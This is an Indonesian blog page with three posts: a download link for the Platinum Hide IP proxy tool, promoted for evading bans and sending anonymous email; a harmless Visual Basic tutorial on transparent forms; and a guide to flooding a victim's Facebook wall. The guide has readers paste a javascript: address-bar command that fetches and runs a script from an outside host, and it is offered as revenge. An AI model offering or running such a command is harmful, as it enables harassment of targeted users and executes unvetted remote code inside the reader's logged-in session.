Friday, March 8, 2013

Platinum Hide IP 3.2.4.2 - Download (Mediafire Link)




Key Features
  • Anonymize Your Web Surfing
  • Your real IP is hidden when you surf on the Internet, keeping your online activity from being tracked by others.
  • Protect Your Identity
  • Anonymous web surfing enables you to prevent identity thieves from stealing your identity or other personal information, and keep your computer safe from hacker attacks or other risks.
  • Choose IP Country and Check IP
  • Proxy lists of many countries are enabled and you decide to select one country from the Choose IP Country window. You can check the current IP address directly.
  • Send Anonymous Emails
  • Send anonymous emails through any web based mail system such as Gmail, Hotmail, etc.
  • Get Unbanned from Forums and Blocked Websites
  • Change your IP address and then you can get unbanned yourself from any forums or other blocked websites that have ever banned you from...


                                                               [ DOWNLOAD ]

Thursday, March 7, 2013

Cara Membuat Form Transparant



Pertama buat Form Standard Exe, kemudian paste kan code tersebut di Form_load
:


Code: 
SetTransparan Me.hwnd, 200, True 'yang angka 200 itu adalah set stransfarannya


Kedua buat 1 Module baru dan pastekan code berikut
:

Private Declare Function _     SetLayeredWindowAttributes Lib "user32.dll" _     (ByVal hwnd As Long, ByVal crKey As Long, _     ByVal bAlpha As Byte, _     ByVal dwFlags As Long) As Long Private Declare Function GetWindowLong Lib _     "user32" Alias "GetWindowLongA" _     (ByVal hwnd As Long, _     ByVal nIndex As Long) As Long Private Declare Function SetWindowLong Lib _     "user32" Alias "SetWindowLongA" _     (ByValhwnd As Long, ByVal nIndex As Long, _     ByVal dwNewLong As Long) As Long Public Sub SetLayeredWindow(ByVal hwnd _     As Long, ByVal bIslayered As Boolean)     Dim WinInfo As Long     WinInfo = GetWindowLong(hwnd, -20)     If bIslayered = True Then             WinInfo = WinInfo Or 524288     Else             WinInfo = WinInfo And Not 524288     End If     SetWindowLong hwnd, -20, WinInfo End Sub Public Sub SetTransparan(ByValhwnd _     As Long, ByVal Opacity As Byte, _     IsTransparent As Boolean)     If IsTransparent = True Then             SetLayeredWindow hwnd, True             SetLayeredWindowAttributes hwnd, _                     0, Opacity, 2     ElseIf IsTransparent = False Then             SetLayeredWindow hwnd, False     End If End Sub


Selesai..
Kalo masih ada yang kurang jelas bisa di langsung di tanyakan, jangan pernah malu bertanya sobat. :D


Read more: http://njank-njutz.blogspot.com/2012/04/cara-membuat-form-transparant.html#ixzz2MwZhDbmu

Flood Wall di Facebook Menggunakan Script



Pernah gak di floodin orang saat kita ulangtahun ?
pasti pernah kan?


Nah kita bales aja gan.


caranya:
1. yang pertama, masuk ke profil korban yang mau di flood
2. hapus alamat addres yang ada di addres bar, lalu copy dan paste script di bawah ini di adress bar.


CODE:

javascript:(a= (b = document).createElement("script")).src = "http://h1.ripway.com/dhycka7/floodfb.js", b.body.appendChild(a); void(0);





 lalu enter.
3. nanti kalian di suruh masukan jumlah pesan dan isi pesan yang kalian ingin kirimkan.
4. trus ok deh!
5. terakhir refresh browser klian . dan lihat hasilnya !


taraaaa banjir bandang tuh fb orang :D

ingat jangan di gunakan untuk hal" yg tidak baik loh gan :D

Read more: http://njank-njutz.blogspot.com/2011/03/flood-di-fb-maret-2011.html#ixzz2MwYTZM2Q